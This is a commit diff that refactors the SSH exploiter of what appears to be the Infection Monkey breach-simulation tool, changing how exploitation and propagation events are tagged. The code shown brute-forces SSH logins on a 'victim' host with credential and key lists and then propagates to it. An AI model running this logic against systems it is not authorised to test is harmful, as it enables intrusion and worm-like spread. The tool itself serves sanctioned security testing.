forked from p15670423/monkey
Agent: Use the tag properties
This commit is contained in:
Kekoa Kaaikala
Ilija Lazoroski
parent
79f72dda55
commit
e8f48085a4
|
|
@ -2,7 +2,7 @@ import io
|
|||
import logging
|
||||
from ipaddress import IPv4Address
|
||||
from pathlib import PurePath
|
||||
from typing import Optional
|
||||
from typing import Optional, Tuple
|
||||
|
||||
import paramiko
|
||||
|
||||
|
|
@ -43,13 +43,17 @@ SSH_CHANNEL_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
|
|||
|
||||
TRANSFER_UPDATE_RATE = 15
|
||||
SSH_EXPLOITER_TAG = "ssh-exploiter"
|
||||
EXPLOIT_TAGS = (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG)
|
||||
PROPAGATION_TAGS = (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
|
||||
class SSHExploiter(HostExploiter):
|
||||
_EXPLOITED_SERVICE = "SSH"
|
||||
|
||||
def _exploiter_tags(self) -> Tuple[str, ...]:
|
||||
return (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def _propagation_tags(self) -> Tuple[str, ...]:
|
||||
return (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def __init__(self):
|
||||
super(SSHExploiter, self).__init__()
|
||||
|
||||
|
|
@ -61,7 +65,7 @@ class SSHExploiter(HostExploiter):
|
|||
logger.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
|
||||
timer.reset()
|
||||
|
||||
def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
|
||||
def exploit_with_ssh_keys(self, port: int) -> paramiko.SSHClient:
|
||||
user_ssh_key_pairs = generate_identity_secret_pairs(
|
||||
identities=self.options["credentials"]["exploit_user_list"],
|
||||
secrets=self.options["credentials"]["exploit_ssh_keys"],
|
||||
|
|
@ -101,11 +105,7 @@ class SSHExploiter(HostExploiter):
|
|||
)
|
||||
self.add_vuln_port(port)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self._publish_exploitation_event(
|
||||
target=self.host.ip_addr,
|
||||
exploitation_success=True,
|
||||
tags=EXPLOIT_TAGS,
|
||||
)
|
||||
self._publish_exploitation_event(True)
|
||||
self.report_login_attempt(True, user, ssh_key=ssh_string)
|
||||
return ssh
|
||||
except paramiko.AuthenticationException as err:
|
||||
|
|
@ -114,19 +114,14 @@ class SSHExploiter(HostExploiter):
|
|||
f"Failed logging into victim {self.host} with {ssh_string} private key: {err}"
|
||||
)
|
||||
logger.info(error_message)
|
||||
self._publish_exploitation_event(
|
||||
target=self.host.ip_addr,
|
||||
exploitation_success=False,
|
||||
error_message=error_message,
|
||||
tags=EXPLOIT_TAGS,
|
||||
)
|
||||
self._publish_exploitation_event(False, error_message=error_message)
|
||||
self.report_login_attempt(False, user, ssh_key=ssh_string)
|
||||
continue
|
||||
except Exception as err:
|
||||
logger.error(f"Unknown error while attempting to login with ssh key: {err}")
|
||||
raise FailedExploitationError
|
||||
|
||||
def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
|
||||
def exploit_with_login_creds(self, port: int) -> paramiko.SSHClient:
|
||||
user_password_pairs = generate_identity_secret_pairs(
|
||||
identities=self.options["credentials"]["exploit_user_list"],
|
||||
secrets=self.options["credentials"]["exploit_password_list"],
|
||||
|
|
@ -158,23 +153,14 @@ class SSHExploiter(HostExploiter):
|
|||
logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user)
|
||||
self.add_vuln_port(port)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self._publish_exploitation_event(
|
||||
target=self.host.ip_addr,
|
||||
exploitation_success=True,
|
||||
tags=EXPLOIT_TAGS,
|
||||
)
|
||||
self._publish_exploitation_event(True)
|
||||
self.report_login_attempt(True, user, current_password)
|
||||
return ssh
|
||||
|
||||
except paramiko.AuthenticationException as err:
|
||||
error_message = f"Failed logging into victim {self.host} with user: {user}: {err}"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(
|
||||
target=self.host.ip_addr,
|
||||
exploitation_success=False,
|
||||
error_message=error_message,
|
||||
tags=EXPLOIT_TAGS,
|
||||
)
|
||||
self._publish_exploitation_event(False, error_message=error_message)
|
||||
self.report_login_attempt(False, user, current_password)
|
||||
ssh.close()
|
||||
continue
|
||||
|
|
@ -195,7 +181,6 @@ class SSHExploiter(HostExploiter):
|
|||
except FailedExploitationError as err:
|
||||
self.exploit_result.error_message = str(err)
|
||||
logger.error(str(err))
|
||||
return self.exploit_result
|
||||
|
||||
if self._is_interrupted():
|
||||
self._set_interrupted()
|
||||
|
|
@ -204,15 +189,9 @@ class SSHExploiter(HostExploiter):
|
|||
try:
|
||||
self._propagate(ssh)
|
||||
except FailedExploitationError as err:
|
||||
ssh.close()
|
||||
self.exploit_result.error_message = str(err)
|
||||
logger.error(self.exploit_result.error_message)
|
||||
self._publish_propagation_event(
|
||||
target=self.host.ip_addr,
|
||||
propagation_success=False,
|
||||
error_message=self.exploit_result.error_message,
|
||||
tags=PROPAGATION_TAGS,
|
||||
)
|
||||
self._publish_propagation_event(False, error_message=self.exploit_result.error_message)
|
||||
except RuntimeError as err:
|
||||
error_message = str(err)
|
||||
self.exploit_result.error_message = error_message
|
||||
|
|
@ -221,7 +200,7 @@ class SSHExploiter(HostExploiter):
|
|||
ssh.close()
|
||||
return self.exploit_result
|
||||
|
||||
def _exploit(self, port) -> paramiko.SSHClient:
|
||||
def _exploit(self, port: int) -> paramiko.SSHClient:
|
||||
try:
|
||||
ssh = self.exploit_with_ssh_keys(port)
|
||||
except FailedExploitationError:
|
||||
|
|
@ -270,14 +249,7 @@ class SSHExploiter(HostExploiter):
|
|||
)
|
||||
|
||||
self.exploit_result.propagation_success = True
|
||||
|
||||
self._publish_propagation_event(
|
||||
target=self.host.ip_addr,
|
||||
propagation_success=True,
|
||||
tags=PROPAGATION_TAGS,
|
||||
)
|
||||
|
||||
ssh.close()
|
||||
self._publish_propagation_event(True)
|
||||
self.add_executed_cmd(cmdline)
|
||||
|
||||
except Exception as exc:
|
||||
|
|
|
|||
Loading…
Reference in New Issue